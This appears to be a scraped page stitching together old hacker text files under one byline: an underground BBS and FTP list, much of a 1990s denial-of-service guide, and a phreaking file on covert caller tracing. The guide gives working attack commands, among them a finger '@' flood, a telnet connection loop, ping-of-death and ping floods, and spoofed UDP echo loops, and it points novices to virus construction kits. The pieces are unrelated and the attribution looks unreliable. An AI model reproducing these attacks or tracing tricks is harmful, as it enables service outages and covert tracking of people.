Telecom Privacy Digest
        Moderator:  Dennis G. Rears
        Network Address: telecom-priv@pica.army.mil

EFF News  Electronic Frontier Foundation
        Network Address:  effnews@eff.org
        Other Address:  155 Second Street  Cambridge, MA 02141
        Phone:  617-864-0665


Computer Underground Digest
        Moderators: Jim Thomas & Gordon Meyer
        Network Address:  tk0jut2@niu

F T P   S I T E S  C O N T A I N I N G    C  U   M A T E R I A L


192.55.239.132
128.95.136.2
128.237.253.5
130.160.20.80
130.18.64.2
128.214.5.6  "MARS Bulletin Board" Login "bbs"
128.82.8.1
128.32.152.11
128.135.12.60

All of the above accept anonymous logins!

B U L L E T I N     B O A R D S

Ripco              312-528-5020
Face-2-Face        713-242-6853
Rune Stone         203-485-0088    Home of NIA
The Works          617-861-8976
The Well           415-332-6106
Blitzkrieg         502-499-8933    Home of TAP
Uncensored         914-761-6877
Manta Lair         206-454-0075    Home of Cybertek


I N D I V I D U A L    N E T W O R K   A D D R E S S E S

Aristotle                   Former Editor of TAP Magazine
                            uk05744@ukpr.uky.edu or uk05744@ukpr.bitnet

Dorthy Denning              Author of "Concerning Hackers Who Break into
                            Computer Systems"
                            denning@src.dec.com

Clifford Stoll              Author of "Cookoo's Egg"
                            cliff@cfa.harvard.edu

Craig Neidorf               Former Editor of Phrack Magazine
                            c483307@umcvmb.missouri.edu

Ground Zero                 Editor of ATI Inc.
                            gzero@tronsbox.xei.com


M I S C    S O F T W A R E

SPAudit  Self-Audit-Kit
1101 Connecticut Avenue
Northwest Suite 901
Washington DC 20036
Phone 202-452-1600
Fax   202-223-8756

Free!!!

 I would like to thank everyone who gave me permission to use their information in this file.

The information provided here is for informational purposes only. What you choose to do with it is your responsibility and no one else's. That means not me, and not the BBS you downloaded this from!

To my knowledge this is the most comprehensive and upto date list of underground books, catalogs, magazines, electronic newsletters, and network addresses available. If there are any additions or corrections to this list please contact me via the Ripco BBS.

                                The Butler...

By Trivedi Jay (B E Electrical Engineer )

email : erjaytrivedi@yahoo.com

An Introduction to Denial of Service

A. INTRODUCTION .

A.1. WHAT IS A DENIAL OF SERVICE ATTACK? .

A.2. WHY WOULD SOMEONE CRASH A SYSTEM? .
A.2.1. INTRODUCTION .
A.2.2. SUB-CULTURAL STATUS .
A.2.3. TO GAIN ACCESS .
A.2.4. REVENGE .
A.2.5. POLITICAL REASONS .
A.2.6. ECONOMICAL REASONS .
A.2.7. NASTINESS .

A.3. ARE SOME OPERATING SYSTEMS MORE SECURE?


B. SOME BASIC TARGETS FOR AN ATTACK .

B.1. SWAP SPACE .
B.2. BANDWIDTH .
B.3. KERNEL TABLES .
B.4. RAM .
B.5. DISKS .
B.6. CACHES .
B.7. INETD

.C. ATTACKING FROM THE OUTSIDE .

C.1. TAKING ADVANTAGE OF FINGER .
C.2. UDP AND SUNOS 4.1.3. .
C.3. FREEZING UP X-WINDOWS .
C.4. MALICIOUS USE OF UDP SERVICES .
C.5. ATTACKING WITH LYNX CLIENTS .
C.6. MALICIOUS USE OF telnet .
C.7. MALICIOUS USE OF telnet UNDER SOLARIS 2.4 .
C.8. HOW TO DISABLE ACCOUNTS .
C.9. LINUX AND TCP TIME, DAYTIME .
C.10. HOW TO DISABLE SERVICES .
C.11. PARAGON OS BETA R1.4 .
C.12. NOVELLS NETWARE FTP .
C.13. ICMP REDIRECT ATTACKS .
C.14. BROADCAST STORMS .
C.15. EMAIL BOMBING AND SPAMMING .
C.16. TIME AND KERBEROS .
C.17. THE DOT DOT BUG .
C.18. SUNOS KERNEL PANIC .
C.19. HOSTILE APPLETS .
C.20. VIRUS .
C.21. ANONYMOUS FTP ABUSE .
C.22. SYN FLOODING .
C.23. PING FLOODING .
C.24. CRASHING SYSTEMS WITH PING FROM WINDOWS 95 MACHINES .
C.25. MALICIOUS USE OF SUBNET MASK REPLY MESSAGE .
C.26. FLEXlm .
C.27. BOOTING WITH TRIVIAL FTP

.D. ATTACKING FROM THE INSIDE .

D.1. KERNEL PANIC UNDER SOLARIS 2.3 .
D.2. CRASHING THE X-SERVER .
D.3. FILLING UP THE HARD DISK .
D.4. MALICIOUS USE OF eval .
D.5. MALICIOUS USE OF fork() .
D.6. CREATING FILES THAT IS HARD TO REMOVE .
D.7. DIRECTORY NAME LOOKUPCACHE .
D.8. CSH ATTACK .
D.9. CREATING FILES IN /tmp .
D.10. USING RESOLV_HOST_CONF .
D.11. SUN 4.X AND BACKGROUND JOBS
.D.12. CRASHING DG/UX WITH ULIMIT .
D.13. NETTUNE AND HP-UX .
D.14. SOLARIS 2.X AND NFS .
D.15. SYSTEM STABILITY COMPROMISE VIA MOUNT_UNION .
D.16. trap_mon CAUSES KERNEL PANIC UNDER SUNOS 4.1.X

.E. DUMPING CORE .

E.1. SHORT COMMENT .E
.2. MALICIOUS USE OF NETSCAPE .
E.3. CORE DUMPED UNDER WUFTPD .
E.4. ld UNDER SOLARIS/X86

.F. HOW DO I PROTECT A SYSTEM AGAINST DENIAL OF SERVICE ATTACKS? .

F.1. BASIC SECURITY PROTECTION .

F.1.1. INTRODUCTION .
F.1.2. PORT SCANNING .
F.1.3. CHECK THE OUTSIDE ATTACKS DESCRIBED IN THIS PAPER .
F.1.4. CHECK THE INSIDE ATTACKS DESCRIBED IN THIS PAPER .
F.1.5. EXTRA SECURITY SYSTEMS .
F.1.6. MONITORING SECURITY .
F.1.7. KEEPING UP TO DATE .
F.1.8. READ SOMETHING BETTER .

F.2. MONITORING PERFORMANCE .

F.2.1. INTRODUCTION .
F.2.2. COMMANDS AND SERVICES .
F.2.3. PROGRAMS .
F.2.4. ACCOUNTING

.G. SUGGESTED READING .

G.1. INFORMATION FOR DEEPER KNOWLEDGE .
G.2. KEEPING UP TO DATE INFORMATION .
G.3. BASIC INFORMATION

.H. COPYRIGHT

.I. DISCLAIMER

.0. FOREWORD ------------

In this paper I have tried to answer the following questions:

 - What is a denial of service attack? - Why would someone crash a system? - How can someone crash a system. - How do I protect a system against denial of service attacks? I also have a section called SUGGESTED READING were you can find information about good free information that can give you a deeper understanding about something.

Note that I have a very limited experience with Macintosh, OS/2 and Windows and most of the material are therefore for Unix use.

You can always find the latest version at the following address: http://www.student.tdb.uu.se/~t95hhu/secure/denial/DENIAL.TXT

Feel free to send comments, tips and so on to address: t95hhu@student.tdb.uu.se

.A. INTRODUCTION ~~~~~~~~~~~~~~~~

.A.1. WHAT IS A DENIAL OF SERVICE ATTACK? -----------------------------------------

Denial of service is about without permission knocking off services, for example through crashing the whole system. This kind of attacks are easy to launch and it is hard to protect a system against them. The basic problem is that Unix assumes that users on the system or on other systems will be well behaved.

.A.2. WHY WOULD SOMEONE CRASH A SYSTEM? --------------------------------------- .

A.2.1. INTRODUCTION --------------------

Why would someone crash a system? I can think of several reasons that I have presentated more precisely in a section for each reason, but for short:

 .1. Sub-cultural status. .2. To gain access. .3. Revenge. .4. Political reasons. .5. Economical reasons. .6. Nastiness.

I think that number one and six are the more common today, but that number four and five will be the more common ones in the future.

.A.2.2. SUB-CULTURAL STATUS ---------------------------

After all information about syn flooding a bunch of such attacks were launched around Sweden. The very most of these attacks were not a part of a IP-spoof attack, it was "only" a denial of service attack. Why?

I think that hackers attack systems as a sub-cultural pseudo career and I think that many denial of service attacks, and here in the example syn flooding, were performed for these reasons. I also think that many hackers begin their carrer with denial of service attacks.

.A.2.3. TO GAIN ACCESS ----------------------

Sometimes could a denial of service attack be a part of an attack to gain access at a system. At the moment I can think of these reasons and specific holes:

 .1. Some older X-lock versions could be crashed with a method from the denial of service family leaving the system open. Physical access was needed to use the work space after.

 .2. Syn flooding could be a part of a IP-spoof attack method.

 .3. Some program systems could have holes under the startup, that could be used to gain root, for example SSH (secure shell).

 .4. Under an attack it could be usable to crash other machines in the network or to deny certain persons the ability to access the system.

 .5. Also could a system being booted sometimes be subverted, especially rarp-boots. If we know which port the machine listen to (69 could be a good guess) under the boot we can send false packets to it and almost totally control the boot.

.A.2.4. REVENGE ---------------

A denial of service attack could be a part of a revenge against a user or an administrator.

.A.2.5. POLITICAL REASONS -------------------------

Sooner or later will new or old organizations understand the potential of destroying computer systems and find tools to do it.

For example imaginate the Bank A loaning company B money to build a factory threating the environment. The organization C therefor crash A:s computer system, maybe with help from an employee. The attack could cost A a great deal of money if the timing is right.

.A.2.6. ECONOMICAL REASONS --------------------------

Imaginate the small company A moving into a business totally dominated by company B. A and B customers make the orders by computers and depends heavily on that the order is done in a specific time (A and B could be stock trading companies). If A and B can't perform the order the customers lose money and change company.

As a part of a business strategy A pays a computer expert a sum of money to get him to crash B:s computer systems a number of times. A year later A is the dominating company.

.A.2.7. NASTINESS -----------------

I know a person that found a workstation where the user had forgotten to logout. He sat down and wrote a program that made a kill -9 -1 at a random time at least 30 minutes after the login time and placed a call to the program from the profile file. That is nastiness.

.A.3. ARE SOME OPERATING SYSTEMS MORE SECURE? ---------------------------------------------

This is a hard question to answer and I don't think that it will give anything to compare different Unix platforms. You can't say that one Unix is more secure against denial of service, it is all up to the administrator.

A comparison between Windows 95 and NT on one side and Unix on the other could however be interesting.

Unix systems are much more complex and have hundreds of built in programs, services... This always open up many ways to crash the system from the inside.

In the normal Windows NT and 95 network were is few ways to crash the system. Although were is methods that always will work.

That gives us that no big different between Microsoft and Unix can be seen regardning the inside attacks. But there is a couple of points left:

 - Unix have much more tools and programs to discover an attack and monitoring the users. To watch what another user is up to under windows is very hard.

 - The average Unix administrator probably also have much more experience than the average Microsoft administrator.

The two last points gives that Unix is more secure against inside denial of service attacks.

A comparison between Microsoft and Unix regarding outside attacks are much more difficult. However I would like to say that the average Microsoft system on the Internet are more secure against outside attacks, because they normally have much less services.

.B. SOME BASIC TARGETS FOR AN ATTACK ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

.B.1. SWAP SPACE ----------------

Most systems have several hundred Mbytes of swap space to service client requests. The swap space is typical used for forked child processes which have a short life time. The swap space will therefore almost never in a normal cause be used heavily. A denial of service could be based on a method that tries to fill up the swap space.

.B.2. BANDWIDTH ---------------

If the bandwidth is to high the network will be useless. Most denial of service attack influence the bandwidth in some way.

.B.3. KERNEL TABLES -------------------

It is trivial to overflow the kernel tables which will cause serious problems on the system. Systems with write through caches and small write buffers is especially sensitive.

Kernel memory allocation is also a target that is sensitive. The kernel have a kernelmap limit, if the system reach this limit it can not allocate more kernel memory and must be rebooted. The kernel memory is not only used for RAM, CPU:s, screens and so on, it it also used for ordinaries processes. Meaning that any system can be crashed and with a mean (or in some sense good) algorithm pretty fast.

For Solaris 2.X it is measured and reported with the sar command how much kernel memory the system is using, but for SunOS 4.X there is no such command. Meaning that under SunOS 4.X you don't even can get a warning. If you do use Solaris you should write sar -k 1 to get the information. netstat -k can also be used and shows how much memory the kernel have allocated in the subpaging. .B.4. RAM ---------

A denial of service attack that allocates a large amount of RAM can make a great deal of problems. NFS and mail servers are actually extremely sensitive because they do not need much RAM and therefore often don't have much RAM. An attack at a NFS server is trivial. The normal NFS client will do a great deal of caching, but a NFS client can be anything including the program you wrote yourself...

.B.5. DISKS -----------

A classic attack is to fill up the hard disk, but an attack at the disks can be so much more. For example can an overloaded disk be misused in many ways.

.B.6. CACHES -------------

A denial of service attack involving caches can be based on a method to block the cache or to avoid the cache.

These caches are found on Solaris 2.X:

Directory name lookup cache: Associates the name of a file with a vnode.

Inode cache: Cache information read from disk in case it is needed again.

Rnode cache: Holds information about the NFS filesystem.

Buffer cache: Cache inode indirect blocks and cylinders to realed disk I/O.

.B.7. INETD -----------

Well once inetd crashed all other services running through inetd no longer will work.

.C. ATTACKING FROM THE OUTSIDE ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 

.C.1. TAKING ADVANTAGE OF FINGER --------------------------------

Most fingerd installations support redirections to an other host.

Ex:

 $finger @system.two.com@system.one.com

finger will in the example go through system.one.com and on to system.two.com. As far as system.two.com knows it is system.one.com who is fingering. So this method can be used for hiding, but also for a very dirty denial of service attack. Lock at this:

 $ finger @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@host.we.attack

All those @ signs will get finger to finger host.we.attack again and again and again... The effect on host.we.attack is powerful and the result is high bandwidth, short free memory and a hard disk with less free space, due to all child processes (compare with .D.5.).

The solution is to install a fingerd which don't support redirections, for example GNU finger. You could also turn the finger service off, but I think that is just a bit to much.

.C.2. UDP AND SUNOS 4.1.3. --------------------------

SunOS 4.1.3. is known to boot if a packet with incorrect information in the header is sent to it. This is the cause if the ip_options indicate a wrong size of the packet.

The solution is to install the proper patch.

.C.3. FREEZING UP X-WINDOWS ---------------------------

If a host accepts a telnet session to the X-Windows port (generally somewhere between 6000 and 6025. In most cases 6000) could that be used to freeze up the X-Windows system. This can be made with multiple telnet connections to the port or with a program which sends multiple XOpenDisplay() to the port.

The same thing can happen to Motif or Open Windows.

The solution is to deny connections to the X-Windows port.

.C.4. MALICIOUS USE OF UDP SERVICES -----------------------------------

It is simple to get UDP services (echo, time, daytime, chargen) to loop, due to trivial IP-spoofing. The effect can be high bandwidth that causes the network to become useless. In the example the header claim that the packet came from 127.0.0.1 (loopback) and the target is the echo port at system.we.attack. As far as system.we.attack knows is 127.0.0.1 system.we.attack and the loop has been establish.

Ex:

 from-IP=127.0.0.1 to-IP=system.we.attack Packet type:UDP from UDP port 7 to UDP port 7

Note that the name system.we.attack looks like a DNS-name, but the target should always be represented by the IP-number.

Quoted from proberts@clark.net (Paul D. Robertson) comment on comp.security.firewalls on matter of "Introduction to denial of service" " A great deal of systems don't put loopback on the wire, and simply emulate it. Therefore, this attack will only effect that machine in some cases. It's much better to use the address of a different machine on the same network. Again, the default services should be disabled in inetd.conf. Other than some hacks for mainframe IP stacks that don't support ICMP, the echo service isn't used by many legitimate programs, and TCP echo should be used instead of UDP where it is necessary. "

.C.5. ATTACKING WITH LYNX CLIENTS ---------------------------------

A World Wide Web server will fork an httpd process as a respond to a request from a client, typical Netscape or Mosaic. The process lasts for less than one second and the load will therefore never show up if someone uses ps. In most causes it is therefore very safe to launch a denial of service attack that makes use of multiple W3 clients, typical lynx clients. But note that the netstat command could be used to detect the attack (thanks to Paul D. Robertson).

Some httpd:s (for example http-gw) will have problems besides the normal high bandwidth, low memory... And the attack can in those causes get the server to loop (compare with .C.6.)

.C.6. MALICIOUS USE OF telnet -----------------------------

Study this little script:

Ex:

 while : ; do telnet system.we.attack & done

An attack using this script might eat some bandwidth, but it is nothing compared to the finger method or most other methods. Well the point is that some pretty common firewalls and httpd:s thinks that the attack is a loop and turn them self down, until the administrator sends kill -HUP.

This is a simple high risk vulnerability that should be checked and if present fixed.

.C.7. MALICIOUS USE OF telnet UNDER SOLARIS 2.4 -----------------------------------------------

If the attacker makes a telnet connections to the Solaris 2.4 host and quits using:

Ex:

 Control-} quit

then will inetd keep going "forever". Well a couple of hundred...

The solution is to install the proper patch.

.C.8. HOW TO DISABLE ACCOUNTS -----------------------------

Some systems disable an account after N number of bad logins, or waits N seconds. You can use this feature to lock out specific users from the system.

.C.9. LINUX AND TCP TIME, DAYTIME ----------------------------------

Inetd under Linux is known to crash if to many SYN packets sends to daytime (port 13) and/or time (port 37).

The solution is to install the proper patch.

.C.10. HOW TO DISABLE SERVICES ------------------------------

Most Unix systems disable a service after N sessions have been open in a given time. Well most systems have a reasonable default (lets say 800 - 1000), but not some SunOS systems that have the default set to 48...

The solutions is to set the number to something reasonable.

.C.11. PARAGON OS BETA R1.4 ---------------------------

If someone redirects an ICMP (Internet Control Message Protocol) packet to a paragon OS beta R1.4 will the machine freeze up and must be rebooted. An ICMP redirect tells the system to override routing tables. Routers use this to tell the host that it is sending to the wrong router.

The solution is to install the proper patch.

.C.12. NOVELLS NETWARE FTP --------------------------

Novells Netware FTP server is known to get short of memory if multiple ftp sessions connects to it.

.C.13. ICMP REDIRECT ATTACKS ----------------------------

Gateways uses ICMP redirect to tell the system to override routing tables, that is telling the system to take a better way. To be able to misuse ICMP redirection we must know an existing connection (well we could make one for ourself, but there is not much use for that). If we have found a connection we can send a route that loses it connectivity or we could send false messages to the host if the connection we have found don't use cryptation.

Ex: (false messages to send)

 DESTINATION UNREACHABLE TIME TO LIVE EXCEEDED PARAMETER PROBLEM PACKET TOO BIG

The effect of such messages is a reset of the connection.

The solution could be to turn ICMP redirects off, not much proper use of the service.

.C.14. BROADCAST STORMS -----------------------

This is a very popular method in networks there all of the hosts are acting as gateways.

There are many versions of the attack, but the basic method is to send a lot of packets to all hosts in the network with a destination that don't exist. Each host will try to forward each packet so the packets will bounce around for a long time. And if new packets keep coming the network will soon be in trouble.

Services that can be misused as tools in this kind of attack is for example ping, finger and sendmail. But most services can be misused in some way or another.

.C.15. EMAIL BOMBING AND SPAMMING ---------------------------------

In a email bombing attack the attacker will repeatedly send identical email messages to an address. The effect on the target is high bandwidth, a hard disk with less space and so on... Email spamming is about sending mail to all (or rather many) of the users of a system. The point of using spamming instead of bombing is that some users will try to send a replay and if the address is false will the mail bounce back. In that cause have one mail transformed to three mails. The effect on the bandwidth is obvious.

There is no way to prevent email bombing or spamming. However have a look at CERT:s paper "Email bombing and spamming".

.C.16. TIME AND KERBEROS ------------------------

If not the the source and target machine is closely aligned will the ticket be rejected, that means that if not the protocol that set the time is protected it will be possible to set a kerberos server of function.

.C.17. THE DOT DOT BUG ----------------------

Windows NT file sharing system is vulnerable to the under Windows 95 famous dot dot bug (dot dot like ..). Meaning that anyone can crash the system. If someone sends a "DIR ..\" to the workstation will a STOP messages appear on the screen on the Windows NT computer. Note that it applies to version 3.50 and 3.51 for both workstation and server version.

The solution is to install the proper patch.

.C.18. SUNOS KERNEL PANIC -------------------------

Some SunOS systems (running TIS?) will get a kernel panic if a getsockopt() is done after that a connection has been reset.

The solution could be to install Sun patch 100804.

.C.19. HOSTILE APPLETS ----------------------

A hostile applet is any applet that attempts to use your system in an inappropriate manner. The problems in the java language could be sorted in two main groups:

 1) Problems due to bugs. 2) Problems due to features in the language.

In group one we have for example the java bytecode verifier bug, which makes is possible for an applet to execute any command that the user can execute. Meaning that all the attack methods described in .D.X. could be executed through an applet. The java bytecode verifier bug was discovered in late March 1996 and no patch have yet been available (correct me if I'am wrong!!!).

Note that two other bugs could be found in group one, but they are both fixed in Netscape 2.01 and JDK 1.0.1.

Group two are more interesting and one large problem found is the fact that java can connect to the ports. Meaning that all the methods described in .C.X. can be performed by an applet. More information and examples could be found at address: http://www.math.gatech.edu/~mladue/HostileArticle.html

If you need a high level of security you should use some sort of firewall for protection against java. As a user you could have java disable.

.C.20. VIRUS ------------

Computer virus is written for the purpose of spreading and destroying systems. Virus is still the most common and famous denial of service attack method.

It is a misunderstanding that virus writing is hard. If you know assembly language and have source code for a couple of virus it is easy. Several automatic toolkits for virus construction could also be found, for example: * Genvir. * VCS (Virus Construction Set). * VCL (Virus Construction Laboratory). * PS-MPC (Phalcon/Skism - Mass Produced Code Generator). * IVP (Instant Virus Production Kit). * G2 (G Squared).

PS-MPC and VCL is known to be the best and can help the novice programmer to learn how to write virus.

An automatic tool called MtE could also be found. MtE will transform virus to a polymorphic virus. The polymorphic engine of MtE is well known and should easily be catch by any scanner.

.C.21. ANONYMOUS FTP ABUSE --------------------------

If an anonymous FTP archive have a writable area it could be misused for a denial of service attack similar with with .D.3. That is we can fill up the hard disk.

Also can a host get temporarily unusable by massive numbers of FTP requests.

For more information on how to protect an anonymous FTP site could CERT:s "Anonymous FTP Abuses" be a good start.

.C.22. SYN FLOODING -------------------

Both 2600 and Phrack have posted information about the syn flooding attack. 2600 have also posted exploit code for the attack.

As we know the syn packet is used in the 3-way handshake. The syn flooding attack is based on an incomplete handshake. That is the attacker host will send a flood of syn packet but will not respond with an ACK packet. The TCP/IP stack will wait a certain amount of time before dropping the connection, a syn flooding attack will therefore keep the syn_received connection queue of the target machine filled.

The syn flooding attack is very hot and it is easy to find more information about it, for example:

 [.1.] http://www.eecs.nwu.edu/~jmyers/bugtraq/1354.html Article by Christopher Klaus, including a "solution". [.2.] http://jya.com/floodd.txt 2600, Summer, 1996, pp. 6-11. FLOOD WARNING by Jason Fairlane

 [.3.] http://www.fc.net/phrack/files/p48/p48-14.html IP-spoofing Demystified by daemon9 / route / infinity for Phrack Magazine

.C.23. PING FLOODING --------------------

I haven't tested how big the impact of a ping flooding attack is, but it might be quite big.

Under Unix we could try something like: ping -s host to send 64 bytes packets.

If you have Windows 95, click the start button, select RUN, then type in: PING -T -L 256 xxx.xxx.xxx.xx. Start about 15 sessions.

.C.24. CRASHING SYSTEMS WITH PING FROM WINDOWS 95 MACHINES ----------------------------------------------------------

If someone can ping your machine from a Windows 95 machine he or she might reboot or freeze your machine. The attacker simply writes:

ping -l 65510 address.to.the.machine

And the machine will freeze or reboot.

Works for kernel 2.0.7 up to version 2.0.20. and 2.1.1. for Linux (crash). AIX4, OSF, HPUX 10.1, DUnix 4.0 (crash). OSF/1, 3.2C, Solaris 2.4 x86 (reboot).

.C.25. MALICIOUS USE OF SUBNET MASK REPLY MESSAGE --------------------------------------------------

The subnet mask reply message is used under the reboot, but some hosts are known to accept the message any time without any check. If so all communication to or from the host us turned off, it's dead.

The host should not accept the message any time but under the reboot.

.C.26. FLEXlm -------------

Any host running FLEXlm can get the FLEXlm license manager daemon on any network to shutdown using the FLEXlm lmdown command.

# lmdown -c /etc/licence.dat lmdown - Copyright (C) 1989, 1991 Highland Software, Inc.

Shutting down FLEXlm on nodes: xxx Are you sure? [y/n]: y Shut down node xxx #

.C.27. BOOTING WITH TRIVIAL FTP -------------------------------

To boot diskless workstations one often use trivial ftp with rarp or bootp. If not protected an attacker can use tftp to boot the host.

.D. ATTACKING FROM THE INSIDE ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Read More click here

By Trivedi Jay (B E Electrical Engineer )

email : erjaytrivedi@yahoo.com

An Introduction into TeleScan

The Ultimate Skip Tracing Weapon

INTRODUCTION
 Whats all the hoopla? Well I've been trying to find a good ANI demo ever since IIRG's went down at the first of the year [800-852-9932]. Well I finally got one from The Mortician. Here it is...
                           8 0 0 . 7 7 5 . 5 5 1 3
 This is an ANI demo provided by a security company called TEL-SCAN(tm). Now ANI is cool and useful and everything, but it isn't hardly worthy of one of my wonderful headers. But see, theres more at stake here. Call the demo and get the ANI info and all that, and if you're a lamer stop there. But if you're kK00l enough, stay on the line and find out more about TEL-SCAN(tm), the company providing the demo.

THE TEL-SCAN(tm) NETWORK

 TEL-SCAN(tm) is a Colorado based Security service that offers an improvised skip-tracing method to Private Investigators, (or anyone with money and a good MO). How it works is this: subscribers are provided with an 800 "Identifier Line" which when called automatically identifies the incoming number and records it into a corresponding Voice Mail Box. The subscriber can then call the Mail Box and it will relay to him all incoming calls to the "Identifier Line". 2-o0 pH_ukYn /<eW/! The possibilities with ANI and VMBs at hand are endless!!!

 TEL-SCAN(tm) can be used as such: Get a bunch of business cards printed with the "Identifier Line" printed as your phone number. If you're looking for someone, leave your card around places where they're likely to get it. When they call, you've got the number they're calling from and possibly an important lead. Viola! Skip-Tracing improvised. No this of course is constitutes intended use. As far as underground use goes...well...you know.

TEL-SCAN(tm) GEOGRAPHICALS

 For more information on TEL-SCAN(tm) write or call::
                    TEL-SCAN(tm)
                    2641 North Taft
                    Loveland, CO  80538
                    Number: 303.663.1703
                    FAX: 303.663.1708

 By the way when you call, you will be asked where you heard about TEL- SCAN(tm). DO NOT say you heard it from me (duh)! Have a good one ready because they will hang up on you if they think something is funny. TEL-SCAN(tm) PRICES This service has a one time activation fee of $67.00 dollars. Thereafter you are charged $5.00 dollars everytime the service identifies a number for you. You are billed monthly if applicable, but there are no mandatory monthly fees. Now here's the good part: you can subscribe to the service via FAXed licensing agreement at which time you will IMMEDIATLEY be issued a Mail Box and a "Line Identifier". They will bill you later for the activation fee. Not to shabby huh?

OUTRODUCTION Well thats it, and thanks again to The Mortician at Lies, Hate, and Deception (LHD·) for this one. Look for other oB files (with great headers) labeled as xxxxxxxx.oB. These files can be found at...

 oleBuzzard's kn0wledge phreak   |   sUmthyn lykE 4000+ text fylez  

 AC 303.382.5968--NUP = NO NUP |  hAck/phrEAk/AnArky/vIrII/cArd    

 24oo-14.4ooKiloBaud-Open 24/7  | n0 phUckyn lAmEr wArEz do0dz!  

By Trivedi Jay (B E Electrical Engineer )

email : erjaytrivedi@yahoo.com